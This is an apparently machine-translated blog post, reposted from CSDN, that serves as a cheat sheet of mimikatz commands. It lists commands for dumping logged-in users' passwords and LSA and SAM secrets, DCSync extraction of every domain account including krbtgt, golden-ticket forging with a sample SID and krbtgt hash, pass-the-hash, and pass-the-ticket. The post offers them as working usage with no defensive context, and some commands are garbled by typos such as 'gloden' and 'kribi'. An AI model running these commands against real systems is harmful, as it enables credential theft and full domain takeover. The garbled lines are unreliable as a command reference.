mimikatzの一般的に使用されるコマンドの概要

序文

管理者権限で使用しますが、管理者権限がない場合は基本的にすべての機能が正常に使用できませんのでご注意ください。

コマンド

通常の管理者が実行できるコマンド(パスワードクエリと権限の検出とログ)

lsadump :: lsa / injectは、すべてのユーザーのすべての詳細を表示できます
ここに画像の説明を挿入

privilege :: debugは最初のコマンドを開き、実行する必要があります。
logこのコマンドの実行後のいわゆる出力は、現在のディレクトリのmimikatz.logファイルに保存されます。
ここに画像の説明を挿入
sekurlsa :: logonpasswordsは、ログインしているユーザーのパスワードをリストします(より一般的に使用されます)
ここに画像の説明を挿入

ドメイン制御権限でのみ実行できるコマンド

lsadump :: dcsync /domain:test.com / user:krbtgt指定したユーザーのパスワード情報を出力します

lsadump :: dcsync /domain:test.com / all / csvドメイン内のすべてのユーザーのアカウントパスワードを一覧表示する
ここに画像の説明を挿入

金札関連

請求書情報のクリアとクエリ

ケルベロス::リストリストのすべてのチケット
のKerberos ::パージはすべてのチケットを削除
ここに画像の説明を挿入
sekurlsa ::ケルベロスリストはKerberos資格情報を検証し、(ほとんどが使用されていないだけのドメインで使用することができない)
ここに画像の説明を挿入
sekurlsa ::チケット/エクスポートリストすべてのチケットを(基本的には使用されず、ドメインでのみ使用できます)
ここに画像の説明を挿入

メモをとる

nthashを使用してメモを作成する

kerberos :: golden / user:Administrator /domain:test.com / sid:S-1-5-21-4166986646-4168497534-2490551922 / krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi

krbtgtのハッシュ値を使用します。

kerberos :: gloden / user:Administrator /domain:xxx.xxx.xxx / sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi

krbtgtのaes256値を使用します。

kerberos :: gloden /domain:xxx.xxx / sid:xxxxxxxxxxx / aes256:xxxxxxxx / user:Administrator /ticket:test.kribi

pth攻撃:

sekurlsa :: pth /domian:test.com / user:zhangsan / ntlm:3dbde697d71690a769204beb12283678
lsadump :: dcsync /domain:test.com / all / csv

キャッシュにチケットをロード

kerberos :: ptt 1.kirbi

samファイルをクラックする

lsadump :: sam /sam:sam.hiv /system:system.hiv

mimikatzの使い方を参照

おすすめ

転載: blog.csdn.net/qq_41874930/article/details/108266353